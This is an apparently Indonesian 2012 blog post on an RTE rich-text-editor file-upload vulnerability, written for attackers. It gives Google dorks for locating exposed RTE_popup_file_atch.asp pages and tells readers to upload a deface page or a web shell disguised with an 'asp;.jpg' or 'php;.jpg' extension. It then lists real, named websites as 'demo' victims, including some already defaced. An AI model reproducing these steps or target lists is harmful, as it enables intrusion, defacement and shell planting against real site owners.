8/06/2012

RTE remote File Upload Vulnerability

webencryptie.jpg (320×180)Google Dorks

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
inurl:/rte/RTE_popup_file_atch.asp
inurl:/admin/RTE_popup_file_atch.asp


Exploit: 

http://www.website.com/rte/RTE_popup_file_atch.asp
or
http://www.website.com/admin/RTE_popup_file_atch.asp



Goto Url and Upload your deface page or upload your shell as asp;.jpg or php;.jpg


Demo :
http://loor.ir/sysop/my_documents/my_files/3D8_M4x007.html
http://www.ullerslev-gaf.dk/admin/my_documents/my_files/EC9_M4x007.html
http://loor.ir/sysop/my_documents/my_files/3D8_M4x007.html
http://adnormous.com/my_documents/my_files/M4x007.html
http://seacoastredondo.com/admin/my_documents/my_files/2CD_M4x007.html
http://pgathailand.com/scripts/my_documents/my_files/AF3_M4x007.html

 You'll see Your Uploded file URL in this Box

More Demo Websits :
lakeguntersville.org/RTE_popup_file_atch.asp
http://solonschools.org/portal/webquest/RTE_popup_file_atch.asp
adventureandspirit.com/ RTE_popup_file_atch.asp
admin.healthyudelmarva.org/RTE_popup_file_atch.asp
adnormous.com/RTE_popup_file_atch.asp
acbathai.org/admin/RTE_popup_file_atch.asp
lksd.org/wow/aoody/RTE_popup_file_atch.asp
tasar.org.uk/startpage/RTE_popup_file_atch.asp
seacoastredondo.com/admin/RTE_popup_file_atch.asp
plymouth-chamber.co.uk/RTE_popup_file_atch.asp
pgathailand.com/scripts/RTE_popup_file_atch.asp
loor.ir/sysop/RTE_popup_file_atch.asp
jrf.org.tw/newjrf/RTE_popup_file_atch.asp
rutc.ac.uk/corpnew/webwiz/RTE_popup_file_atch.asp


Artikel Terkait:

0 komentar:

Post a Comment